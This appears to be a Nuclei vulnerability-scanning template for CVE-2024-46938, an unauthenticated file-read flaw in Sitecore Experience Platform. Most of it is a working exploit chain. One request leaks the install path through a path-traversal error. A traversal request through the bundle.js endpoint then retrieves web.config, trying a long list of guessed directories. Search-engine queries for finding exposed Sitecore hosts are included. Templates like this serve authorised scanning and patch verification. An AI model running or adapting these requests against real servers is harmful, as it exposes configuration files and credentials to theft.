id: CVE-2024-46938 info: name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read author: DhiyaneshDK severity: high description: | An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files. impact: | Unauthenticated attackers can read arbitrary files from the Sitecore server, potentially exposing sensitive configuration and credentials. remediation: | Update Sitecore Experience Platform to a version that patches CVE-2024-46938. reference: - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x - https://nvd.nist.gov/vuln/detail/CVE-2024-46938 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-46938 epss-score: 0.93431 epss-percentile: 0.99828 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: verified: true max-request: 45 vendor: sitecore product: experience_commerce shodan-query: http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" tags: cve,cve2024,sitecore,lfi,rce,vkev,vuln flow: http(1) && http(2) && http(3) http: - method: GET path: - "{{BaseURL}}/-/media/doo-doo.ashx" host-redirects: true matchers: - type: word part: location words: - "/sitecore/service/notfound.aspx" internal: true - raw: - | POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded __PAGESTATE=/../../x/x matchers: - type: word part: body words: - "Could not find a part of the path" internal: true extractors: - type: regex name: file_path group: 1 regex: - Could not find a part of the path '([^']+)\\x\\x\.txt internal: true - raw: - | GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1 Host: {{Hostname}} payloads: paths: - '{{file_path}}\' - 'C:\inetpub\wwwroot\sitecore\' - 'C:\inetpub\wwwroot\sitecore1\' - 'C:\inetpub\wwwroot\sxa\' - 'C:\inetpub\wwwroot\XP0.sc\' - 'C:\inetpub\wwwroot\Sitecore82\' - 'C:\inetpub\wwwroot\Sitecore81\' - 'C:\inetpub\wwwroot\Sitecore81u2\' - 'C:\inetpub\wwwroot\Sitecore7\' - 'C:\inetpub\wwwroot\Sitecore8\' - 'C:\inetpub\wwwroot\Sitecore70\' - 'C:\inetpub\wwwroot\Sitecore71\' - 'C:\inetpub\wwwroot\Sitecore72\' - 'C:\inetpub\wwwroot\Sitecore75\' - 'C:\Websites\spe.dev.local\' - 'C:\inetpub\wwwroot\SitecoreInstance\' - 'C:\inetpub\wwwroot\SitecoreSPE_8\' - 'C:\inetpub\wwwroot\SitecoreSPE_91\' - 'C:\inetpub\wwwroot\Sitecore9\' - 'C:\inetpub\wwwroot\sitecore93sc.dev.local\' - 'C:\inetpub\wwwroot\Sitecore81u3\' - 'C:\inetpub\wwwroot\sitecore9.sc\' - 'C:\inetpub\wwwroot\sitecore901xp0.sc\' - 'C:\inetpub\wwwroot\sitecore9-website\' - 'C:\inetpub\wwwroot\sitecore93.sc\' - 'C:\inetpub\wwwroot\' - 'C:\inetpub\{{Hostname}}.sc\' - 'C:\inetpub\{{FQDN}}.sc\' - 'C:\inetpub\{{RDN}}.sc\' - 'C:\inetpub\{{FQDN}}\' - 'C:\inetpub\{{RDN}}\' - 'C:\inetpub\{{Hostname}}\' - 'C:\inetpub\{{Hostname}}.sitecore\' - 'C:\inetpub\{{FQDN}}.sitecore\' - 'C:\inetpub\{{RDN}}.sitecore\' - 'C:\inetpub\{{Hostname}}.website\' - 'C:\inetpub\{{FQDN}}.website\' - 'C:\inetpub\{{RDN}}.website\' - 'C:\inetpub\{{Hostname}}.dev.local\' - 'C:\inetpub\{{FQDN}}.dev.local\' - 'C:\inetpub\{{RDN}}.dev.local\' - 'C:\inetpub\{{Hostname}}sc.dev.local\' - 'C:\inetpub\{{FQDN}}sc.dev.local\' - 'C:\inetpub\{{RDN}}sc.dev.local\' stop-at-first-match: true matchers: - type: dsl dsl: - 'contains(body, "")' - 'contains(content_type, "text/javascript")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100cdb8c71bd7925cf611a740aa2e46b679d80ec3b61d813a25e02e23874bc2789d022100c0accf41d323d8a7aad2defd6f98f2c38ef16c2d3e54a76564240a07d6214552:922c64590222798bb761d5b6d8e72950